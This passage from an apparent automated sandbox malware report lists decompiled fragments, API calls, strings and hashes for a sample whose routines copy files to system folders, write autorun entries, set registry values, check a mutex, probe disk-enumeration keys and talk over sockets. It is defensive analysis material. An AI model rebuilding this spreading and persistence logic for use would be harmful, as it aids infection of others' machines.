							_pop(__esi);
							__edi = __esi;
							__ecx = 0xf4;
							goto L45;
							L15:
							__ebx = __ebx + __ebx;
							__eflags = __ebx;
						} while (__eflags != 0);
					}
				}
				L63:
			}

0x1000b675
0x1000b834
0x10001065
0x10001068
0x1000106e
0x100010b7
0x100010be
0x100010c3
0x100010c8
0x100010ca
0x100010f7
0x100010fc
0x10001102
0x100010cc
0x100010cc
0x100010d2
0x100010d7
0x100010dc
0x00000000
0x100010dc
0x10001070
0x10001070
0x10001070
0x10001077
0x1000107e
0x10001081
0x10001086
0x1000109a
0x100010e3
0x100010e3
0x1000109e
0x100010a8
0x100010f0
0x100010aa
0x100010aa
0x100010aa
0x100010a8
0x100010ac
0x100010ac
0x100010b4
0x1000b67b
0x1000b67b
0x1000b67c
0x1000b681
0x1000b687
0x1000b69a
0x1000b69a
0x1000b69c
0x1000b69f
0x1000b6a1
0x1000b6a1
0x1000b690
0x1000b692
0x1000b693
0x1000b695
0x1000b695
0x00000000
0x1000b695
0x1000b6a3
0x1000b6a3
0x1000b6a8
0x1000b6a8
0x1000b6a8
0x1000b6a8
0x1000b6a8
0x1000b6aa
0x1000b6ac
0x1000b6ae
0x1000b6b1
0x1000b6b1
0x1000b6b3
0x1000b6b5
0x1000b6b5
0x1000b6b5
0x1000b6b9
0x00000000
0x00000000
0x00000000
0x1000b6bb
0x1000b6bb
0x1000b6bd
0x1000b6bd
0x1000b6c0
0x1000b6c0
0x1000b6c4
0x1000b6c6
0x1000b6c6
0x1000b6c9
0x1000b6d8
0x1000b6d8
0x1000b6d8
0x1000b6da
0x1000b6dc
0x1000b6de
0x1000b6e1
0x1000b6e1
0x1000b6e3
0x1000b6e5
0x1000b6e5
0x1000b6e7
0x1000b6e9
0x1000b6eb
0x1000b6ee
0x1000b6ee
0x1000b6f0
0x1000b6f2
0x1000b6f4
0x1000b6f4
0x1000b6f4
0x1000b6f5
0x1000b6f5
0x1000b6f5
0x1000b6f5
0x1000b6f5
0x1000b6f7
0x1000b6f9
0x1000b6fb
0x1000b6fe
0x1000b6fe
0x1000b700
0x1000b702
0x1000b702
0x1000b702
0x1000b706
0x00000000
0x00000000
0x00000000
0x1000b708
0x1000b708
0x1000b70a
0x1000b70a
0x1000b70d
0x1000b70d
0x1000b711
0x1000b711
0x1000b711
0x1000b714
0x1000b71a
0x1000b71d
0x1000b720
0x1000b723
0x1000b734
0x1000b734
0x1000b736
0x1000b739
0x1000b73b
0x1000b73e
0x1000b73e
0x1000b73e
0x1000b743
0x1000b725
0x1000b725
0x1000b725
0x1000b727
0x1000b728
0x1000b72a
0x1000b72b
0x1000b72b
0x1000b72b
0x1000b72e
0x00000000
0x1000b752
0x1000b752
0x1000b752
0x1000b752
0x1000b754
0x1000b755
0x1000b757
0x1000b757
0x1000b75b
0x1000b75b
0x1000b760
0x1000b762
0x1000b765
0x1000b769
0x1000b76c
0x1000b76c
0x1000b76c
0x1000b76e
0x1000b770
0x1000b773
0x1000b775
0x1000b777
0x1000b77a
0x1000b77c
0x1000b77e
0x1000b784
0x1000b784
0x1000b784
0x1000b786
0x1000b786
0x1000b788
0x00000000
0x00000000
0x1000b78a
0x1000b78d
0x1000b794
0x1000b797
0x1000b797
0x1000b7a0
0x1000b7a0
0x1000b7a0
0x1000b7a1
0x1000b7a1
0x1000b7a3
0x1000b7a4
0x1000b7a4
0x1000b7a6
0x00000000
0x00000000
0x1000b7a8
0x1000b7ab
0x1000b7ac
0x1000b7af
0x1000b7b5
0x1000b7b5
0x1000b7b7
0x1000b7c0
0x1000b7c1
0x1000b7c1
0x1000b7c3
0x1000b7b9
0x1000b7b9
0x1000b7bb
0x00000000
0x1000b7bb
0x00000000
0x1000b7b7
0x1000b7a1
0x1000b7c6
0x1000b7c6
0x1000b7c9
0x1000b7cc
0x1000b7cc
0x1000b7ce
0x1000b7d0
0x1000b7d1
0x1000b7d1
0x1000b7d3
0x00000000
0x00000000
0x1000b7d5
0x1000b7d7
0x1000b7ea
0x1000b7ec
0x1000b7ef
0x1000b7f2
0x1000b7f2
0x1000b7d9
0x1000b7db
0x1000b7dd
0x1000b7dd
0x1000b7dd
0x1000b7df
0x1000b7e2
0x1000b7e2
0x1000b7e2
0x1000b7e4
0x1000b7e6
0x1000b7e6
0x1000b7f7
0x1000b7fd
0x1000b803
0x1000b808
0x1000b80e
0x1000b810
0x1000b816
0x1000b819
0x1000b819
0x1000b819
0x1000b81d
0x1000b823
0x1000b825
0x1000b826
0x1000b827
0x1000b82b
0x1000b82b
0x1000b82d
0x1000b82d
0x1000b831
0x00000000
0x1000b831
0x1000b6cb
0x1000b6ce
0x1000b6d0
0x1000b6d1
0x1000b6d1
0x1000b6d4
0x1000b6d6
0x00000000
0x1000b6d6
0x1000b74a
0x1000b74b
0x1000b74d
0x00000000
0x1000b696
0x1000b696
0x1000b696
0x1000b696
0x1000b6a1
0x1000b69a
0x00000000

Strings

oseHandle, xrefs: 1000B67C

Memory Dump Source

Source File: 00000000.00000002.272231192.000000001000B000.00000080.00000001.01000000.00000004.sdmp, Offset: 10000000, based on PE: true

Associated: 00000000.00000002.272180761.0000000010000000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.272186570.0000000010001000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.272191811.0000000010005000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.272194370.0000000010008000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.272197653.000000001000A000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.272234892.000000001000C000.00000004.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_10000000_EAfIchN1gN.jbxd

Similarity

API ID:
String ID: oseHandle
API String ID: 0-3110874022
Opcode ID: 55b444f5287c2d11894ddcccc202fc63c889c2cb23919d4899b9ba0c6a4af2f8
Instruction ID: 6777197e7aff05cd1e47f9124ab84a08ecd71be59056bc9e2c07408dd8449df4
Opcode Fuzzy Hash: 55b444f5287c2d11894ddcccc202fc63c889c2cb23919d4899b9ba0c6a4af2f8
Instruction Fuzzy Hash: DD51F871648B925BF710DE788CC07957BD4DB812E4B290738D9E5CB3CAE7A8580687A0

Uniqueness

Uniqueness Score: -1.00%

Function 004049EA Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 57COMMON

Download Yara Rule

APIs

Part of subcall function 00404748: RegOpenKeyExA.ADVAPI32(?,?,?,?,?,?,?,?,00404A84), ref: 00404781
Part of subcall function 00404748: RegOpenKeyExA.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,?,?,00404A84), ref: 004047AF
Part of subcall function 00404748: RegQueryValueExA.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,?,00404A84), ref: 004047EA
Part of subcall function 00404748: RegCloseKey.ADVAPI32 ref: 004047FA

CharLowerA.USER32 ref: 00404A8B

Part of subcall function 00404990: strstr.MSVCRT ref: 004049C7

Strings

012, xrefs: 00404A45
SYSTEM\ControlSet001\Services\Disk\Enum, xrefs: 004049F5

Memory Dump Source

Source File: 00000000.00000002.272092118.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.272089061.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.272105006.0000000000419000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.272107983.000000000041C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.272110481.000000000041D000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.272113008.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_EAfIchN1gN.jbxd

Similarity

API ID: Open$CharCloseLowerQueryValuestrstr
String ID: 012$SYSTEM\ControlSet001\Services\Disk\Enum
API String ID: 2399448135-1634863437
Opcode ID: 63ad2961c44aed94491a08e231f8cdb63fefdf94793549163df92be3ee8e9100
Instruction ID: 870a1de997922802b68f1717d84fe3bed6c75bca7598e79a585ce558600d9c18
Opcode Fuzzy Hash: 63ad2961c44aed94491a08e231f8cdb63fefdf94793549163df92be3ee8e9100
Instruction Fuzzy Hash: 7221A6B4904218DFCB60DF68EA8069DBBF4EB48314F50413AE958F7750D33499498F99

Uniqueness

Uniqueness Score: -1.00%

Function 1000271B Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 16fileCOMMON

Download Yara Rule

APIs

fopen.MSVCRT ref: 1000272F
fclose.MSVCRT ref: 10002740

Strings

Q, xrefs: 10002721

Memory Dump Source

Source File: 00000000.00000002.272186570.0000000010001000.00000040.00000001.01000000.00000004.sdmp, Offset: 10000000, based on PE: true

Associated: 00000000.00000002.272180761.0000000010000000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.272191811.0000000010005000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.272194370.0000000010008000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.272197653.000000001000A000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.272231192.000000001000B000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.272234892.000000001000C000.00000004.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_10000000_EAfIchN1gN.jbxd

Similarity

API ID: fclosefopen
String ID: Q
API String ID: 1280645193-3894087120
Opcode ID: d11b7e04d193afe19875c3f0bb31fea1c1a234c9f78bf7c27ca1675ec82f5387
Instruction ID: fc467ff3ac9e7cdac0bddd603bffc4fa3c1df253e59169ed2f43415d9b654fe0
Opcode Fuzzy Hash: d11b7e04d193afe19875c3f0bb31fea1c1a234c9f78bf7c27ca1675ec82f5387
Instruction Fuzzy Hash: AFD09E7860430457E701AB75954535B7AD9DB402C4F41C828E8858F38DE6B5E8418791

Uniqueness

Uniqueness Score: -1.00%

Function 10002A16 Relevance: 4.5, APIs: 3, Instructions: 20synchronizationCOMMON

Download Yara Rule

APIs

rot13.SHERVANS ref: 10002A2B

Part of subcall function 10001F26: rot13c.SHERVANS ref: 10001F40

CreateMutexA.KERNEL32 ref: 10002A43
GetLastError.KERNEL32 ref: 10002A4B

Memory Dump Source

Source File: 00000000.00000002.272186570.0000000010001000.00000040.00000001.01000000.00000004.sdmp, Offset: 10000000, based on PE: true

Associated: 00000000.00000002.272180761.0000000010000000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.272191811.0000000010005000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.272194370.0000000010008000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.272197653.000000001000A000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.272231192.000000001000B000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.272234892.000000001000C000.00000004.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_10000000_EAfIchN1gN.jbxd

Similarity

API ID: CreateErrorLastMutexrot13rot13c
String ID:
API String ID: 915986942-0
Opcode ID: ee8ea586af41e913590f4dc365a00a8f608733261f8a1858d002a386ab06bff8
Instruction ID: 37426019501c0c1615168472e2e031f059b69aac5c44e8d8eb959c1da4a6e9fe
Opcode Fuzzy Hash: ee8ea586af41e913590f4dc365a00a8f608733261f8a1858d002a386ab06bff8
Instruction Fuzzy Hash: DFE04FB44083059AD700EF61C5C139EBFF4EF40385F40841DE88843286D779A5489B23

Uniqueness

Uniqueness Score: -1.00%

Function 10002EA8 Relevance: 4.5, APIs: 3, Instructions: 9
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E10002EA8(struct _SECURITY_ATTRIBUTES* __ebx, signed int __edx, intOrPtr __edi, intOrPtr __esi, void* __eflags) {
				void* _t9;

				_t9 = __eflags;
				_t5 = __ebx;
				E10002C6C(); // executed
				E10002A16(__ebx); // executed
				E10002806(_t5, __edx, __edi, __esi, _t9); // executed
				return 0;
			}

0x10002ea8
0x10002ea8
0x10002eae
0x10002eb3
0x10002eb8
0x10002ec3

APIs

copy_filez.SHERVANS ref: 10002EAE

Part of subcall function 10002C6C: rot13.SHERVANS ref: 10002C88
Part of subcall function 10002C6C: add_system_direcroty.SHERVANS ref: 10002CA2
Part of subcall function 10002C6C: rot13.SHERVANS ref: 10002CB2
Part of subcall function 10002C6C: add_system_direcroty.SHERVANS ref: 10002CCC
Part of subcall function 10002C6C: CopyFileA.KERNEL32 ref: 10002CE0

mutex_check.SHERVANS ref: 10002EB3

Part of subcall function 10002A16: rot13.SHERVANS ref: 10002A2B
Part of subcall function 10002A16: CreateMutexA.KERNEL32 ref: 10002A43
Part of subcall function 10002A16: GetLastError.KERNEL32 ref: 10002A4B

copy_autoinf.SHERVANS ref: 10002EB8

Part of subcall function 10002806: rot13.SHERVANS ref: 10002829
Part of subcall function 10002806: Get_Reg_SZ.SHERVANS ref: 10002849
Part of subcall function 10002806: sss_rans.SHERVANS ref: 10002859
Part of subcall function 10002806: Write_REG_SZ.SHERVANS ref: 10002894
Part of subcall function 10002806: rot13.SHERVANS ref: 100028AA
Part of subcall function 10002806: add_system_direcroty.SHERVANS ref: 100028C4
Part of subcall function 10002806: filetyt.SHERVANS ref: 100028D2
Part of subcall function 10002806: wsprintfA.USER32 ref: 10002900
Part of subcall function 10002806: CreateFileA.KERNEL32 ref: 10002938
Part of subcall function 10002806: WriteFile.KERNEL32 ref: 1000297F
Part of subcall function 10002806: CloseHandle.KERNEL32 ref: 1000298A
Part of subcall function 10002806: SetFileAttributesA.KERNEL32 ref: 100029A3

Memory Dump Source

Source File: 00000000.00000002.272186570.0000000010001000.00000040.00000001.01000000.00000004.sdmp, Offset: 10000000, based on PE: true

Associated: 00000000.00000002.272180761.0000000010000000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.272191811.0000000010005000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.272194370.0000000010008000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.272197653.000000001000A000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.272231192.000000001000B000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.272234892.000000001000C000.00000004.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_10000000_EAfIchN1gN.jbxd

Similarity

API ID: rot13$File$add_system_direcroty$Create$AttributesCloseCopyErrorGet_HandleLastMutexReg_WriteWrite_copy_autoinfcopy_filezfiletytmutex_checksss_ranswsprintf
String ID:
API String ID: 2813818644-0
Opcode ID: 093c64d432fdb6e2285a5a98a3c5134fac210d630f0c210cb98ae6cf3dcb151b
Instruction ID: e12c022bba1e22a18cbfb1e123279ba149248782693e9a4da0a20551277887d2
Opcode Fuzzy Hash: 093c64d432fdb6e2285a5a98a3c5134fac210d630f0c210cb98ae6cf3dcb151b
Instruction Fuzzy Hash: EAB0920CA0010403F000F2B8194BB0D704C9B51598F404031A5409118AAC44B42882B7

Uniqueness

Uniqueness Score: -1.00%

Function 00405C6C Relevance: 3.1, APIs: 2, Instructions: 64fileCOMMON

Download Yara Rule

APIs

WriteFile.KERNEL32 ref: 00405CBE
WriteFile.KERNEL32 ref: 00405D35

Memory Dump Source

Source File: 00000000.00000002.272092118.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.272089061.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.272105006.0000000000419000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.272107983.000000000041C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.272110481.000000000041D000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.272113008.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_EAfIchN1gN.jbxd

Similarity

API ID: FileWrite
String ID:
API String ID: 3934441357-0
Opcode ID: d63655d2dcbc60839257c6e938d84bfe055410ba38a70233d950f78cf1ccbd3a
Instruction ID: f1047de20eb3893e32fccaf0b86581f2c31394c201b131b44f92a60914293b21
Opcode Fuzzy Hash: d63655d2dcbc60839257c6e938d84bfe055410ba38a70233d950f78cf1ccbd3a
Instruction Fuzzy Hash: F12174B09043594BCB10DF29C89439EBBB4EF84310F00C5BFD95997381D7349A898FA5

Uniqueness

Uniqueness Score: -1.00%

Function 10001060 Relevance: 3.1, APIs: 2, Instructions: 53COMMON

Download Yara Rule

APIs

malloc.MSVCRT ref: 100010BE

Part of subcall function 10001000: ??3@YAXPAX@Z.MSVCRT ref: 10001043
Part of subcall function 10001000: fflush.MSVCRT ref: 10001057

Memory Dump Source

Source File: 00000000.00000002.272186570.0000000010001000.00000040.00000001.01000000.00000004.sdmp, Offset: 10000000, based on PE: true

Associated: 00000000.00000002.272180761.0000000010000000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.272191811.0000000010005000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.272194370.0000000010008000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.272197653.000000001000A000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.272231192.000000001000B000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.272234892.000000001000C000.00000004.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_10000000_EAfIchN1gN.jbxd

Similarity

API ID: ??3@fflushmalloc
String ID:
API String ID: 3823167246-0
Opcode ID: b4ed8e0dcb01610a8e0155abcafffdc3cf178930a4c4465fac26594983f5d97f
Instruction ID: c3d61e731865bd7456064c518874042fb421375ce73593d0c675da1890093c8e
Opcode Fuzzy Hash: b4ed8e0dcb01610a8e0155abcafffdc3cf178930a4c4465fac26594983f5d97f
Instruction Fuzzy Hash: B5016135A043919BF711EFB8899178F7BD8FB442D0F118429E8808B24DDBB0E8808792

Uniqueness

Uniqueness Score: -1.00%

Function 00405D46 Relevance: 3.0, APIs: 2, Instructions: 31fileCOMMON

Download Yara Rule

APIs

CreateFileA.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,004041F6), ref: 00405D83

Part of subcall function 00405C6C: WriteFile.KERNEL32 ref: 00405CBE
Part of subcall function 00405C6C: WriteFile.KERNEL32 ref: 00405D35

CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,004041F6), ref: 00405DB7

Memory Dump Source

Source File: 00000000.00000002.272092118.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.272089061.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.272105006.0000000000419000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.272107983.000000000041C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.272110481.000000000041D000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.272113008.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_EAfIchN1gN.jbxd

Similarity

API ID: File$Write$CloseCreateHandle
String ID:
API String ID: 148219782-0
Opcode ID: 72e9fedbf2843b56b6a6daafb9acc6cb085d47cfbc8d447e6dd53778901cb612
Instruction ID: 00d198e32dff6483e67d0ab4778baf528fffa47fc69d76bf6507d571ee69b3a3
Opcode Fuzzy Hash: 72e9fedbf2843b56b6a6daafb9acc6cb085d47cfbc8d447e6dd53778901cb612
Instruction Fuzzy Hash: 92F0E7B0509305ABE700AF75D1C930BBEE4AB40358F008A2DE4D55B2D2D7B99A488B96

Uniqueness

Uniqueness Score: -1.00%

Function 00401280 Relevance: 3.0, APIs: 2, Instructions: 16
COMMON

Download Yara Rule

C-Code - Quality: 23%

			E00401280() {
				void* _t4;
				intOrPtr* _t5;
				intOrPtr* _t8;

				 *_t8 = 1;
				 *0x41949c();
				E00401150();
				_t5 = _t8;
				 *((intOrPtr*)(_t8 - 8)) = 2;
				 *0x41949c(_t4); // executed
				E00401150(); // executed
				_push(_t5);
				goto __ecx;
			}

0x00401286
0x0040128d
0x00401293
0x004012a1
0x004012a6
0x004012ad
0x004012b3
0x004012c0
0x004012ca

APIs

__set_app_type.MSVCRT ref: 0040128D

Part of subcall function 00401150: SetUnhandledExceptionFilter.KERNEL32 ref: 0040115E
Part of subcall function 00401150: __getmainargs.MSVCRT ref: 0040119E
Part of subcall function 00401150: _setmode.MSVCRT ref: 004011D8
Part of subcall function 00401150: _setmode.MSVCRT ref: 004011FC
Part of subcall function 00401150: __p__fmode.MSVCRT ref: 00401210
Part of subcall function 00401150: __p__environ.MSVCRT ref: 0040122A
Part of subcall function 00401150: _cexit.MSVCRT ref: 0040124D
Part of subcall function 00401150: ExitProcess.KERNEL32 ref: 00401255

__set_app_type.MSVCRT ref: 004012AD

Memory Dump Source

Source File: 00000000.00000002.272092118.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.272089061.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.272105006.0000000000419000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.272107983.000000000041C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.272110481.000000000041D000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.272113008.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_EAfIchN1gN.jbxd

Similarity

API ID: __set_app_type_setmode$ExceptionExitFilterProcessUnhandled__getmainargs__p__environ__p__fmode_cexit
String ID:
API String ID: 570162737-0
Opcode ID: 36b1d3dea03947f55434b9ec7bd84f55484cfed7e86ffaa1a5bdde0d5196f56c
Instruction ID: 752eb1ab21b4c19d55682f3c7b2bcf3a34383202cb890f95c9a90ba33a14ec6c
Opcode Fuzzy Hash: 36b1d3dea03947f55434b9ec7bd84f55484cfed7e86ffaa1a5bdde0d5196f56c
Instruction Fuzzy Hash: 02D09B354142149BC7007BF5DC0A399BBA86B09301F41443CE6CD67261D6743C4947DA

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 00401C2C Relevance: 49.3, APIs: 20, Strings: 8, Instructions: 294stringnetworksleepCOMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 00401C63
memset.MSVCRT ref: 00401C81
_mbscat.MSVCRT ref: 00401C90
_mbscat.MSVCRT ref: 00401CCD

Part of subcall function 00405316: gethostname.WS2_32 ref: 0040532B
Part of subcall function 00405316: gethostbyname.WS2_32 ref: 00405336
Part of subcall function 00405316: inet_ntoa.WS2_32 ref: 00405351

_mbscat.MSVCRT ref: 00401D1B

Part of subcall function 00405256: GetVersionExA.KERNEL32 ref: 00405272

_mbscat.MSVCRT ref: 00401D49
_mbscat.MSVCRT ref: 00401D7D
Sleep.KERNEL32 ref: 00401E82
_mbscat.MSVCRT ref: 00401DD7

Part of subcall function 00404F0A: GetModuleHandleA.KERNEL32 ref: 00404F27
Part of subcall function 00404F0A: LoadLibraryA.KERNEL32 ref: 00404F41
Part of subcall function 00404F0A: InternetGetConnectedState.WININET ref: 00404F6B

send.WS2_32 ref: 00401EF2
recv.WS2_32 ref: 00401F2A
strtok.MSVCRT ref: 00401F89
strtok.MSVCRT ref: 00401FA8
closesocket.WS2_32 ref: 00401FBD
atoi.MSVCRT ref: 00401FD4
atoi.MSVCRT ref: 00401FEA
memset.MSVCRT ref: 00402043
lstrlen.KERNEL32 ref: 00402051

Part of subcall function 0040447C: CryptAcquireContextA.ADVAPI32 ref: 004044BD
Part of subcall function 0040447C: CryptCreateHash.ADVAPI32 ref: 004044F7
Part of subcall function 0040447C: CryptHashData.ADVAPI32 ref: 00404528
Part of subcall function 0040447C: CryptDestroyHash.ADVAPI32 ref: 0040453A
Part of subcall function 0040447C: CryptReleaseContext.ADVAPI32 ref: 00404550

lstrcmp.KERNEL32 ref: 004020AB
lstrcmp.KERNEL32 ref: 004020CD

Strings

3159, xrefs: 00401CE8
ost:, xrefs: 00401DB8
-Age, xrefs: 00401E1A
nt: , xrefs: 00401E25
P, xrefs: 00401E93
wer, xrefs: 00401E4F
=-A, xrefs: 00401DCD, 00401E9B
expl, xrefs: 00401E44

Memory Dump Source

Source File: 00000000.00000002.272092118.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.272089061.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.272105006.0000000000419000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.272107983.000000000041C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.272110481.000000000041D000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.272113008.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_EAfIchN1gN.jbxd

Similarity

API ID: _mbscat$Crypt$Hashmemset$Contextatoilstrcmpstrtok$AcquireConnectedCreateDataDestroyHandleInternetLibraryLoadModuleReleaseSleepStateVersionclosesocketgethostbynamegethostnameinet_ntoalstrlenrecvsend
String ID: -Age$3159$=-A$P$expl$nt: $ost:$wer
API String ID: 1488133686-2239103369
Opcode ID: 6c291d1ab130d950e73a0d21f9dfd0606c72a42a2e497424fde83289429f6f05
Instruction ID: 99ea3051cc31653010b65aed47ab6d4c6dbc815114f0d374468db723e332898a
Opcode Fuzzy Hash: 6c291d1ab130d950e73a0d21f9dfd0606c72a42a2e497424fde83289429f6f05
Instruction Fuzzy Hash: 79C186B48043148BD724AF29C58535A7BF1EF85318F2086AEE45C5B7D2CB798D86CF46

Uniqueness

Uniqueness Score: -1.00%

Function 00403790 Relevance: 19.4, APIs: 7, Strings: 4, Instructions: 133filestringCOMMON

Download Yara Rule

APIs

_mbscpy.MSVCRT ref: 004037D8
memset.MSVCRT ref: 0040383B
FindFirstFileA.KERNEL32 ref: 0040385C
FindNextFileA.KERNEL32 ref: 00403888
lstrcpy.KERNEL32 ref: 004038CC
_mbscat.MSVCRT ref: 00403910
FindClose.KERNEL32 ref: 00403957

Strings

., xrefs: 004038AA
., xrefs: 00403898
\, xrefs: 004038E4
*.*, xrefs: 0040381A

Memory Dump Source

Source File: 00000000.00000002.272092118.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.272089061.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.272105006.0000000000419000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.272107983.000000000041C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.272110481.000000000041D000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.272113008.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_EAfIchN1gN.jbxd

Similarity

API ID: Find$File$CloseFirstNext_mbscat_mbscpylstrcpymemset
String ID: *.*$.$.$\
API String ID: 1316374366-446526362
Opcode ID: 26e3bcea411a8c7c4bbc4843d5bdfb40b3e1660c35f98ae57de979e8483c3eb5
Instruction ID: b4465dfa5f332ec533157c87ff7dca4d317d8e0d8912ef682c4f4d402bf95f8b
Opcode Fuzzy Hash: 26e3bcea411a8c7c4bbc4843d5bdfb40b3e1660c35f98ae57de979e8483c3eb5
Instruction Fuzzy Hash: 505194758083588ADB20AF35C48839DBFE5AF44315F1486BEE859673C1DB788F88CB46

Uniqueness

Uniqueness Score: -1.00%

Function 0040447C Relevance: 19.4, APIs: 10, Strings: 1, Instructions: 105
encryptionCOMMON

Download Yara Rule

C-Code - Quality: 26%

			E0040447C(intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
				void* _v12;
				void _v28;
				long* _v32;
				void* _v36;
				char _v40;
				char _v44;
				int _v60;
				int _v64;
				int _v68;
				int _v72;
				char* _v76;
				int _v80;
				int _v84;
				intOrPtr _v88;
				int _v100;
				intOrPtr _v104;
				intOrPtr _v108;
				int _v112;
				char* _v116;
				char* _v120;
				intOrPtr _v124;
				int _v128;
				int _v132;
				char* _v136;
				void* _v140;
				intOrPtr _v144;
				signed int _v168;
				intOrPtr _v172;
				int _t54;
				long* _t57;
				int _t60;
				intOrPtr _t76;
				int _t79;
				signed int _t82;
				void* _t83;
				intOrPtr* _t86;
				void* _t88;
				void* _t89;
				intOrPtr* _t90;
				intOrPtr* _t93;

				_t76 = _a12;
				asm("cld");
				memset( &_v28, 0, 4 << 2);
				_v60 = 0;
				_v64 = 1;
				_v68 = 0;
				_v72 = 0;
				_t54 = CryptAcquireContextA( &_v32);
				_t86 = _t83 - 0x40 + 0xc - 0x14;
				_t79 = 0;
				if(_t54 != 0) {
					_v76 =  &_v36;
					_v80 = 0;
					_v84 = 0;
					_v88 = 0x8003;
					_t57 = _v32;
					 *_t86 = _t57;
					L0040C4B0();
					_t88 = _t86 - 0x14;
					_t79 = 0;
